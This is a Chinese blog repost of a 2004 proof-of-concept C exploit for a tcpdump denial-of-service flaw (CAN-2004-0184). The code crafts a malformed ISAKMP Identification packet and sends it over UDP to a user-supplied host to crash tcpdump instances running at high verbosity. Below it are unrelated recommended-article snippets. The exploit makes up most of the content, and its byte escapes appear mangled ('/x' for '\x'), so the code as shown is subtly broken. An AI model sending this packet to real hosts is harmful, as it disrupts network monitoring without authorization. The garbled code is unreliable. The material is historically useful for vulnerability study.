Tcpdump ISAKMP Identification payload Integer Denial of Service Exploit

最新推荐文章于 2022-08-08 14:51:25 发布
最新推荐文章于 2022-08-08 14:51:25 发布
阅读量799 收藏
点赞数
分类专栏: 安全技术 文章标签: integer service struct documentation debian exchange
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettywolf/article/details/579200
版权
文章出处:黑白网络 http://www.heibai.net/article/info/info.php?sessid=&infoid=11184
* tcpdump packet sniffer
* Integer underflow in ISAKMP Identification payload
* denial of service vulnerability
* proof of concept code
* version 1.0 (Apr 02 2004)
* CVE-ID: CAN-2004-0184
*
* by Remi Denis-Courmont < exploit at simphalampin dot com >
* http://www.simphalempin.com/dev/
* Remi Denis-Courmont is not responsible for the misuse of the
* source code provided hereafter.
*
* This vulnerability was found by:
* Rapid7, LLC Security Advisory - http://www.rapid7.com/
* whose original advisory may be fetched from:
* http://www.rapid7.com/advisories/R7-0017.html
*
* Vulnerable:
* - tcpdump 3.8.1
*
* Not vulnerable:
* - tcpdump 3.8.3
*
* NOTES:
* The vulnerability cannot be exploited to cause a denial of service
* with the Debian's tcpdump packages as it was partly fixed as part of
* the fix for earlier known CAN-2003-0108 vulnerability, though the bug
* is still present. That may be the case for other vendors which were
* not investigated.
*
* tcpdump must be run with a verbosity level of at least 3:
* # tcpdump -vvv
* Otherwise, no denial of service will occur.
*/


/*****************************************************************************
* Copyright (C) Remi Denis-Courmont 2004. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright *
* notice, this list of conditions and the following disclaimer. *
* 2. Redistributions in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
*****************************************************************************/


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>

#include <netdb.h>

static const char packet[] =
/* ISAKMP header */
"/x00/x00/x00/x00/x00/x00/x00/x00" /* Initiator cookie */
"/x00/x00/x00/x00/x00/x00/x00/x00" /* Responder cookie */
"/x05" /* Next payload: Identification */
"/x10" /* Version: 1.0 */
"/x01" /* Exchange type */
"/x00" /* Flags */
"/x00/x00/x00/x00" /* Message ID */
"/x00/x00/x00/x24" /* Length */

/* ISAKMP Identification payload */
"/x00" /* Next payload: none */
"/x00" /* Reserved */
"/x00/x05" /* Payload length (incorrect) */
"/x20" /* ID type (unknown) */
"/x00/x00/x00" /* DOI */
;

static int
send_evil_packet (const struct addrinfo *r)
{
int fd;
size_t len;

fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
if (fd == -1)
{
perror ("Socket error");
return 1;
}

len = sizeof (packet) - 1;
if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
{
perror ("Packet sending error");
close (fd);
return 1;
}

puts ("Packet sent!");
close (fd);
return 0;
}


static int
proof (const char *hostname)
{
struct addrinfo *res;
int check;

{
struct addrinfo help;
memset (&help, 0, sizeof (help));
help.ai_socktype = SOCK_DGRAM;

check = getaddrinfo (hostname, "isakmp", &help, &res);
}

if (check == 0)
{
struct addrinfo *ptr;

for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
check |= send_evil_packet (ptr);

freeaddrinfo (res);
return check;
}

fprintf (stderr, "%s: %s/n", hostname, gai_strerror (check));
return -1;
}


static void
usage (const char *path)
{
fprintf (stderr, "Usage: %s <hostname/IP>/n", path);
}


int
main (int argc, char *argv[])
{
puts ("tcpdump Integer underflow in ISAKMP Identification payload/n"
"proof of concept code/n"
"Copyright (C) Remi Denis-Courmont 2004 "
"</x65/x78/x70/x6c/x6f/x69/x74/x40/x73/x69/x6d/x70"
"/x68/x61/x6c/x65/x6d/x70/x69/x6e/x2e/x63/x6f/x6d>/n");


if (argc != 2)
{
usage (argv[0]);
return 2;
}

return proof (argv[1]) ? 1 : 0;
}


作者:leftworld
责任编辑:hhxyzwx

prettywolf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ISAKMP Profile技术应用
weixin_34037977的博客
05-22 520
ISAKMP Profile技术是IKE协商的一种新型配置方式。它主要的作用是映射我们第一阶段ISAKMP参数到第二阶段IPSec隧道,可以实现一个设备和多个站点建立多个隧道。还可以很好的消除不同×××之间的影响,让第一阶段策略和第二阶段策略关联的更加紧密。并且ISAKMP Profile普遍在EZ×××和VRF-wareIPSec ×××配置里边被采用。Site1 :cr...
二、Jenkins 学习笔记——Jenkins 安装
wq105032007067的专栏
12-08 1712
Jenkins 的安装非常简单,只需要从 Jenkins 的主页上下载最新的 jenkins.war 文件然后运行 java -jar jenkins.war。同时,还可以点击 Jenkins 页面上的 launch 按钮完成下载和运行 Jenkins。 图 1. Jenkins Launch 按钮 启动 Jenkins 后,会有一个后台进程在命令行模式下运行。此时在浏览器地址栏中
服务器敏感信息泄漏问题,Jenkins服务器漏洞致敏感信息泄露
weixin_29774679的博客
08-06 572
Jenkins是一个开源的自动化服务器软件。近日,Jenkins发布安全公告称Jetty web服务器中存在安全漏洞,攻击者利用该漏洞可以引发内存破坏和机密信息泄露。该漏洞CVE编号为CVE-2019-17638,CVSS 评分为9.4,影响Eclipse Jetty 9.4.27.v20200227 到 9.4.29.v20200521版本。Eclipse Jetty是一个提供Java HTTP...
Jenkins安装及插件安装
rockstics的博客
04-16 837
Jenkins 安装过程中会要求安装推荐插件或自定义插件,此时Jenkins 默认会从官网拉取插件,由于国内网络访问Jenkins 官网特别慢,所以可以通过寻求国内Jenkins源的方式解决插件安装问题 Jenkins 安装时会默认从updates.jenkins-ci.org 拉取,我们可以采用nginx代理的方式将其代理至mirrors.tuna.tsinghua.edu.cn ,方法如下: 配置host 解析: echo “127.0.0.1 updates.jenkins-ci.org” >
IPsec ISAKMP协议
热门推荐
bytxl的专栏
06-30 2万+
IPsec ISAKMP:Internet 安全连接和密钥管理协议 (ISAKMP:Internet Security Association and Key Management Protocol)   Interne 安全连接和密钥管理协议(ISAKMP)是 IPsec 体系结构中的一种主要协议,它结合加密安全的概念,密钥管理和安全连接来建立政府,商家和因特网上的私有通信所需要的安全。
tcpdump源码分享
04-21
tcpdump是一款广泛使用的开源网络数据包分析工具,它允许用户实时捕获并分析网络上的数据包。这个资源包含了tcpdump的4.0和3.9两个版本的源代码,对于理解网络协议、学习网络监控以及进行网络调试具有极高的价值。 ...
tcpdump离线安装
03-03
TCPDump是一款强大的网络封包分析软件,主要用于在网络层截取并分析网络数据包。它在IT行业中被广泛用于网络故障排查、性能优化、安全审计等多个领域。TCPDump的名字由TCP(Transmission Control Protocol)和Dump...
tcpdump离线.rar
10-27
tcpdump是一款广泛使用的网络数据包分析工具,它允许系统管理员或网络工程师实时捕获和分析网络上的数据包。这个“tcpdump离线.rar”压缩包包含两个RPM(Red Hat Package Manager)格式的软件包:libpcap-1.5.3-12....
tcpdump安装、依赖包
06-17
tcpdump是一款广泛使用的网络数据包分析工具,它允许系统管理员或网络工程师实时捕获网络上的数据包,并进行分析。在Linux或Unix系统中,tcpdump是标准的网络诊断和故障排查工具,它可以帮助我们理解网络流量模式,...
tcpdump.zip
04-22
tcpdump是一款强大的网络数据包分析工具,主要用于在网络层捕获并显示网络上的数据包。它在IT领域,尤其是网络诊断、网络安全和网络监控方面扮演着重要角色。通过使用tcpdump,用户可以深入理解网络流量,查找潜在的...
ISAKMP报文封装格式及解释
aaheguosong的博客
04-06 4359
ISAKMP报文封装格式及详解1.IP报文头新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.IP报文头 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器,
linux漏洞英文怎么说,Linux kernel Local Denial of Service Vulnerability (CVE-2017-7308 )
weixin_42508313的博客
05-18 280
// A proof-of-concept local root exploit for CVE-2017-7308.// Includes a SMEP & SMAP bypass.// Tested on 4.8.0-41-generic Ubuntu kernel.// https://github.com/xairy/kernel-exploits/tree/master/CVE-...
Jenkins 3月9日的安全公告
公众号shadow sock7
03-10 461
参考: https://jenkins.io/security/advisory/2020-03-09/ 关注几个标为High的漏洞: OS command injection in CryptoMove Plugin SECURITY-1635 / CVE-2020-2159 所需权限:Job/Configure 目前未修复 看一下官方给的安装量: 醉了,只有1个! 没有人用,忽略了。 RCE...
ISAKMP报文解密
mengshi12的专栏
08-26 4562
使用wireshark抓包
极其详细的isakmp的细节
weixin_33948416的博客
09-21 1660
see:http://book.soundonair.ru/cisco/ch13lev1sec4.html IPsec Negotiation Using the IKE Protocol IKE negotiates IPsec tunnels between two IPsec peers. This negotiation can be done using a combinat...
超详细的网络抓包神器 tcpdump 使用指南
因上努力,果上随缘。但行好事,莫问前程。
08-08 5166
本文主要介绍了 tcpdump 的基本语法和使用方法,并通过一些示例来展示它强大的过滤功能。将 tcpdump 与 wireshark 进行组合可以发挥更强大的功效,本文也展示了如何优雅顺滑地结合 tcpdump 和 wireshark。如果你想了解更多的细节,可以查看 tcpdump 的 man 手册。...
网络的经济基础篇-之二-IPv4、IPv6
edisonlg的专栏
01-02 2279
1      IPv4 Header Length 4-byte (32 bit), minimum = 5 (20 bytes),maximum = 15 (60 bytes) TOS (Type of Service) D:0 = NormalDelay                   1 = Minimize Delay T:0 = NormalThroughp
IP数据报首部的格式identification
birdf2009的博客
04-27 3909
IP数据报首部的格式:关于标识(identification)、标志(flag)和片偏移 关于标识(identification) 标识(identification):占16位。IP软件在存储器中维持一个计数器,每产生一个数据报,计数器就加1,并将此值赋给标识字段。 但这个“标识”不是序号,因为IP是无连接服务,数据报不存在按序接收的问题。当数据报由于长度超过网络的MTU而必须分片时, 这个标识...
linux 交叉编译 tcpdump以及tcpdump的使用
ternence_hsu的博客
10-27 2442
#tcpdump --help tcpdump version 4.9.0 libpcap version 1.7.4 OpenSSL 1.0.2g 1 Mar 2016 Usage: tcpdump [-aAbdDefhHIJKlLnNOpqStuUvxX#] [ -B size ] [ -c count ] [ -C file_size ] [ -E algo:secret ] [
coulden't change tcpdump ownership of savefile
最新发布
06-01
Alternatively, you can change the ownership of the directory to the user running tcpdump by using the chown command. For example, if the user is "user1" and the directory is "/var/log/tcpdump", you ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值